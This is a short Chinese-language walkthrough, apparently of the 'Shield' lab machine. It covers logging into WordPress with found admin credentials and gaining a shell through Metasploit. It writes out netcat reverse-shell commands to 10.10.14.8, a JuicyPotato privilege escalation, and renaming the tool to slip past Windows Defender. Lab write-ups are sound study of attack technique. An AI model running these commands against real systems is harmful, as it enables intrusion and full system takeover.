文章目录
Shield
扫描文件
神奇的出来个这个
扫描发现存在wordpress站点
用admin/P@s5w0rd!成功登陆后台
发现存在漏洞的
后面发现可以直接用msf来利用,完美的
换个目录方便我上传文件
接下来cd C:/inetpub/wwwroot/wordpress/wp-content/uploads
刚刚发现文件放错地方了重新来一下
执行execute -f nc.exe -a "-e cmd.exe 10.10.14.8 1234"
成功接收到shell
接下来上传upload JuicyPotato.exe,利用MS16-075提权,网上wp说防止被windows defender拿下
mv JuicyPotato.exe js.exe
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.8 1111 > shell.bat
接下来机器开启nc监听等待提权返回
js.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\she.bat -l 1337
成功提权
